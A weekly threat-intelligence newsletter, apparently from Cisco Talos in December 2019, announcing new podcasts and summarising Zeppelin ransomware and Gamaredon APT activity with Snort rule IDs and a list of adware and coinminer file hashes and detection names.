Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We have an early holiday present for you! This week, we introduced a new podcast to the Talos family. Talos Takes, a new short-form show, takes listeners through a quick breakdown of a particular topic or security news story, with our Talos spin. The first three episodes are available now on the Talos podcasts page, and on the Beers with Talos feed. In 2020, we’ll give Talos Takes its own feed you’ll be able to subscribe to.
Not to be overshadowed, there is also a new Beers with Talos episode available just in time for your holiday road trip. This week’s episode features special guest Joe Marshall from the Talos Outreach team, who brings his expertise on IoT and ICS security to the table.
To wrap up the year, we released a blog post running through the top malware and cyber news stories of 2019. This post is a perfect place to look back on all the major research we put out this year.
Cisco’s annual winter shutdown begins next week, so this will be the last Threat Source newsletter until Jan. 9. See you in 2020!
Title:New malware-as-a-service family targets tech, health care companies
**Description:**The new Zeppelin malware is targeting health care and tech companies in the U.S. and Europe. Researchers believe Zeppelin is a variant of the ransomware-as-a-service family known as Vega. While Vega started out earlier this year targeting Russian-speaking victims, researchers believe the malware could be in a new adversaries’ hands now that they are targeting users elsewhere. Zeppelin is highly configurable and can be deployed as an EXE, DLL, or wrapped in a PowerShell loader.
**Snort SIDs:52451 – 52453 (By Nicholas Mavis)
** ****Title:Gamaredon attacks spread to Ukrainian journalists, law enforcement agencies
**Description:**A well-known APT is expanding its pool of targets, now going after journalists and law enforcement agencies in Ukraine. The group, which is believed to have Russian ties based on the language used in their malware, previously went after Ukrainian military and government agencies. There are also new TTPs associated with this group, including the use template injection in their malware.
**Snort SIDs:**52445 - 52448 (By Joanne Kim)
SHA 256:d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81**** **MD5: **5142c721e7182065b299951a54d4fe80 **Typical Filename: **FlashHelperServices.exe **Claimed Product: **Flash Helper Service **Detection Name: PUA.Win.Adware.Flashserv::1201 **
****SHA 256:0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94
**MD5:**7c38a43d2ed9af80932749f6e80fea6f
**Typical Filename:**xme64-520.exe
**Claimed Product:**N/A
**Detection Name:PUA.Win.File.Coinminer::1201
** ****SHA 256:1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871
**MD5:**c2406fc0fce67ae79e625013325e2a68
**Typical Filename:**SegurazoIC.exe
**Claimed Product:**Digital Communications Inc.
**Detection Name:**PUA.Win.Adware.Ursu::95.sbx.tg
SHA 256:f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc
**MD5:**c5608e40f6f47ad84e2985804957c342
**Typical Filename:**FlashHelperServices.exe
**Claimed Product:Flash Helper Service
Detection Name: PUA:2144FlashPlayer-tpd **
****SHA 256:15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
**MD5:**799b30f47060ca05d80ece53866e01cc
**Typical Filename:**mf2016341595.exe
**Claimed Product:**N/A
**Detection Name:**W32.Generic:Gen.22fz.1201
Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.